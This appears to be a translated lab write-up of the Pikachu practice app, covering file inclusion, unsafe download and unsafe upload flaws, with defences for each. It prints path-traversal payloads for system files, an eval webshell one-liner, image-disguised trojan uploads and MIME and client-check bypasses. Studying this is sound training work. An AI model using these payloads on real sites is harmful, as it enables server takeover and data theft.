Table of contents
1. File Inclusion (file contains loopholes)
2. File Inclusion (local) local
3.File Inclusion (remote) remote
Two, Unsafe file download (file download)
3. Unsafe file upload (file upload)
1. File Inclusion (file contains loopholes)
1 Overview
file includes, is a function. Various development languages provide built-in file inclusion functions, which allow developers to directly include (introduce) another code file in one code file. For example, in PHP, it provides:
include(), include_once()
require(), require_once()
- require(), which will generate a fatal error and stop the script if the included file cannot be found.
- include(), only a warning will be generated if the included file cannot be found, and the script will continue to run.
- include_once() is similar to include(), the only difference is that if the code in the file has already been included, it will not be included again.
- require_once() is similar to require(), the only difference is that if the code in the file has already been included, it will not be included again.
These files contain functions that are frequently used in code design.
Vulnerability reason
The include() function does not care what type of file is included. As long as there is php code, it will be parsed out. If the website has a file containing a loophole, the jpg file can be parsed as a php file.
Most of the time, the code files included in the file include function are fixed, so there is no security issue either. However, sometimes, the code file included in the file is written as a variable, and this variable can be passed in by the front-end user. In this case, if not enough security considerations are taken, it may cause a file inclusion vulnerability. The attacker will designate an "unexpected" file for the containing function to execute, thereby causing malicious operations. According to different configuration environments, the file contains vulnerabilities into the following two situations:
1.1 Local file inclusion vulnerability: only local files on the server can be included. Since the files on the server are not controlled by the attacker, in this case, the attacker will include more fixed system configuration files, thus Read system sensitive information. In many cases, local file inclusion vulnerabilities will be combined with some special file upload vulnerabilities to form greater power.
1.2 Remote file inclusion vulnerability: remote files can be included through the url address, which means that the attacker can pass in arbitrary code.
Therefore, in the functional design of the web application system, try not to allow front-end users to directly pass variables to the containing function. If you must do this, you must also implement a strict whitelist policy for filtering.
how to defend
1. Use str_replace and other methods to filter out dangerous characters
2. Configure open_basedir to prevent directory traversal
3. The php version is upgraded to prevent %00 from being truncated
4. Rename the uploaded file to prevent it from being read
5. A whitelist can be set for dynamically included files, and non-whitelisted files will not be read
6. Do a good job in the division of administrator rights and the management of file rights
2. File Inclusion (local) local
Entering the level is a drop-down box, let us choose NBA stars, we choose Kobe, and the pictures and character profiles pop up.
URL
http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#Seeing that the URL contains a file file1.php, it may be contained in the file, and since it is passed from the front end to the back end through the URL parameter, it can be controlled by the user. If there is no strict filtering, there may be a file contained loophole.
We tried other NBA stars and found that they are file2.php----file5.php
1.1 Read hidden files
In this case, let's run it with bp
blast 2 this position
Dictionary with 6-100
Arrange the blasting results according to the length, and found that there are four lengths as follows, which respectively represent file6.php, file7.php, file14.php, and file100.php
file6.php hidden file containing username and password
file7.php returned an error, and file14.php and file100.php both reported the same error message. Through this error report, we can know that the function used to include files in fi_local.php is include() , and the included file path is the same as Files in the include folder under the same folder as fi_local.php .
Get the path D:\Users\phpstudy_pro\WWW\pikachu\vul\fileinclude
1.2 Read files in different folders
We upload a php code in txt format
Because name is not the path of file6.php (actually in the include file), use ../ to return to the previous directory.
http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=../kiss.txt&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
1.3 Read system files
The file that the windows system must have is C:\Windows\win.ini , use this to try to see if there are any file inclusion vulnerabilities.
Combined with the leaked fi_local.php file location in the error message, the relative path can be calculated as C:/../../../../windows/win.ini, which is substituted into the url to form the payload:
http://127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=C:/../../../../windows/win.ini&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
1.4 combined with file upload getshell
In the getimagesize level of pikachu Unsafe Fileupload unsafe file upload, a picture horse was uploaded. The picture horse was renamed 41634263ae58e27421b852355994.jpg, and its content contained a one-sentence Trojan horse as shown in the figure below.
Forge a picture.jpg
File upload w.jpg, echo part of the path and the newly generated image file name
Combining the directories contained in the file to get the payload:
127.0.0.1/pikachu/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2022/12/30/64272863ae5dff2699f401247946.jpg&submit=提交查询The file contains url to visit
Connect with Ant Sword
connection succeeded! ! !
3.File Inclusion (remote) remote
In a remote include vulnerability, an attacker can load remote code by accessing an external address.
The complete parameters of the include() function are given in the url
http://127.0.0.1/pikachu/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#Try remote including http
http://127.0.0.1/pikachu/vul/fileinclude/fi_remote.php?filename=https://www.csdn.net/&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#
So in this level, in addition to remote file inclusion, you can also use absolute paths for local file inclusion.
Write a one-sentence Trojan horse that generates a shell
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[123]) ?> '); ?>
although nothing happened
Look at the file path and generate shell.php
Change the shell.txt of the url to shell.php
connection succeeded! ! !
Two, Unsafe file download (file download)
1 Overview
The file download function will appear on many web systems. Generally, when we click the download link, a download request will be sent to the background. Generally, this request will contain a file name to be downloaded. After receiving the request, the background will start to execute the download code. , and send the file response corresponding to the file name to the browser to complete the download. If the background receives the requested file name and directly spells it into the path of the downloaded file without performing a security judgment on it, it may cause an unsafe file download vulnerability.
At this time, if the attacker submits a carefully constructed path (such as ../../../etc/passwd) instead of the expected file name of a program, it is very likely that the specified file will be directly Download it. As a result, background sensitive information (password files, source code, etc.) is downloaded.
Therefore, when designing the file download function, if the downloaded target file is passed in by the front end, security considerations must be taken for the incoming file. Remember: All data that interacts with the front end is not safe and should not be taken lightly!
Vulnerability principle
It provides users with a download function and can receive related parameter variables
During development, related functions for reading files were used
There is no corresponding control or lax control of the front-end user's request to read the file (restriction, verification)
Can output the content of the requested file and provide it to the front-end for download
Vulnerability hazard
Any file from the server can be downloaded:
-
Obtain the web source code of the website, and then audit the code to obtain more vulnerabilities
-
Obtain middleware configuration files such as websites, servers, systems, and databases
-
Get applied to the system configuration file
-
Conduct a probe on the information on the intranet
-
Download various .log files, and look for background addresses, file upload points, etc.
defense
- Purify data: Uniformly encode the file name parameters passed by the user, control the whitelist of file types, and reject parameters containing malicious characters or null characters.
- The arbitrary file download vulnerability may also be caused by the low version of the middleware used by the web. For example, the arbitrary file download vulnerability of ibm's websphere needs to be updated to fix the middleware version.
- The address of the file to be downloaded is saved in the database.
- Save the file path to the database, and let the user submit the file corresponding to the ID to download the file.
- Users need to judge permissions before downloading files, and access permissions can be set in open_basedir
- The files are placed in a directory that the web cannot directly access.
- Filter . to not allow directory traversal services.
- Public files can be placed in the download directory of the web application and downloaded through links.
2.unsafedownload
Click on the avatar to download the picture
It was downloaded directly, without jumping, and the url did not change in any way.
Right click to view web page source code
Quickly locate relevant codes by player name
Similar to <a href="execdownload.php?filename=kb.png">Kobe Bryant</a> corresponds to the file download point
Assemble execdownload.php?filename= with the path of the current web page, followed by the path of the file we want:
payload:127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=../123.txt
If using an absolute path is not possible:
127.0.0.1/pikachu/vul/unsafedownload/execdownload.php?filename=D:\Users\phpstudy_pro\WWW\pikachu\vul\unsafedownload/123.txt
The reason is that the parameter passed in on line 10 is preceded by splicing the download directory
delete download/
You can download it with absolute path access next time
3. Unsafe file upload (file upload)
1 Overview
The file upload function is very common in web application systems. For example, many websites need to upload avatars, upload attachments, etc. when registering. When the user clicks the upload button, the background will judge the uploaded file, such as whether it is the specified type, suffix name, size, etc., and then rename it according to the designed format and store it in the specified directory. If the background does not make any security judgments on the uploaded files or the judgment conditions are not rigorous enough, the attacker may upload some malicious files, such as a one-word Trojan horse, which will cause the background server to be webshelled.
Therefore, when designing the file upload function, we must strictly consider the security of the incoming files. For example:
--Verify the file type, suffix name, size;
--Verify the upload method of the file;
--Rename the file to a certain extent;
--Do not expose the path after the file is uploaded;
--Etc...
1. Black box search
file background
Entering the background of the website may not necessarily obtain the authority of the website, you can obtain the authority of the website from the background
Member Centre
Upload via picture
Document scanning
Use tools to scan out the background path
2. White box lookup
Through code analysis to upload vulnerabilities
Find the file upload function
How to defend against file upload
Isolate uploaded files from web services,
use whitelist filtering, limit uploaded file types,
set file upload path to non-executable permission check,
file upload path comes with
function detection, custom function detection
image rendering, rename uploaded files,
compress file content, Generate File Contents Check File Contents
File upload vulnerability bypass method
File Contains Bypass
Front-End Restriction Bypass
File Extension Bypass
ashx Upload Bypass
Special File Name Bypass
00 Truncation Bypass Upload
htaccess Parsing Vulnerability
Breakthrough MIME Limit Upload Parsing
Vulnerability Bypass
Condition Competition Bypass
CONTENT-LENGTH Bypass
2. Client check
The suffix name of the uploaded file is verified by the js script on the front end, and the file type uploaded by the user is restricted by setting a blacklist and a whitelist. This verification method is very insecure and can be easily bypassed. It can be easily bypassed by intercepting and modifying data packets, or even closing js directly in the browser.
Only images are allowed to be uploaded.
write a one-sentence trojan horse
Here directly disable the browser's js, or bp packet capture.
Disable browser js (Firefox plug-in is not found)
only in this way
url input about:config
Enter JavaScript in the search box, find javascript.enabled and convert it to false
After uploading the php file for the second time, it was found that the direct upload was successful.
Upload and capture packets with bp
BP capture situation
Change the .jpg file to .php
The upload is successful, and the path to save the file is uploads/w.php (in many actual situations, the path to save the file will not be returned, and you need to blast or guess it yourself)
Visit the path, and you can see our one-sentence Trojan file header GIF89, which proves that it can be accessed successfully.
http://127.0.0.1/pikachu/vul/unsafeupload/uploads/w.php
Connect with Ant Sword
connection succeeded! ! !
the code
F12 view, although it is a whitelist filter, but it is useless to put it on the front end. . .
3. Server check
The server will detect the content-type field in the uploaded data to determine whether it is in the specified file format.
Upload a php file, pop-up format jpg, jpeg, png
Upload jpg files, the same upload path
At this time, the jpg file cannot be connected with Ant Sword
Take a look at the package, the key package is here
We need to change .jpg to .php, and change image/ to jpg, jpeg, png, otherwise the upload will not be successful.
image/jpeg
image/php, will not succeed
image/php, upload file.jpg, also will not succeed
Ant Sword Connection
the code
MIME type, which is reflected in the Content-Type field in the HTTP request message.
$mime is an array containing legal MIME types, that is, the white list of MIME types; then this white list is passed as a parameter to the upload_sick() function for server-side detection.
The upload_sick() function is defined as follows. The insecurity of this function lies in two points:
(1) Only the MIME type is checked, which can be bypassed by packet capture modification.
(2) The file was not renamed when saving the file, so even if the web page does not echo the file save path, there is a high probability that the attacker can guess it.
There is another insecurity in the whole level, that is, the file save path is echoed.
After successfully uploading the webshell and knowing the path to save the file, the attacker can connect to the shell.
4.getimagesize()
The getimagesize() function is used to obtain the image size and related information, and returns an array if it succeeds, or returns FALSE and generates an error message of E_WARNING level if it fails.
The getimagesize() function will determine the size of any GIF, JPG, PNG, SWF, SWC, PSD, TIFF, BMP, IFF, JP2, JPX, JB2, JPC, XBM or WBMP image file and return the dimensions of the image along with the file type and image height and width.
Upload a php file, the suffix seems to be filtered out.
In this case, it should not be possible to capture packets by bp and change packets. Let’s try it.
Sure enough not
Since only the image format can be uploaded, it is possible to forge the header of the image and add a sentence Trojan horse, but it cannot parse out the php file, or run the Trojan horse php file, and can only be exploited in combination with the file containing the vulnerability. The above files contain exploits implemented too.
the code
This level is the safest among the three levels. You cannot upload php files, and you need to combine the files with loopholes (or middleware parsing loopholes), but it is not safe enough.
The main reason for the lack of security is that the uploaded file can still contain php code.
This level first specifies two white lists, $_type is the file name suffix white list, $_mime is the MIME type white list, and then sends the two white lists together with some other parameters to the upload() function
The upload() function is defined as follows, and the main filtering actions are:
(1) Lines 123~127, use the file name suffix white list $type to filter files whose suffixes are not in the white list
(2) Lines 130~134, use the MIME type whitelist $mime to filter files whose MIME type is not in the whitelist
(3) Lines 136~140, use the getimagesize() function to determine whether it is a real picture (can be bypassed by the picture horse)
(4) Lines 157~161, modify the file name to a random value (originally to prevent attackers from guessing the file path, but since the file save path is echoed on the web page, this renaming step seems useless.)
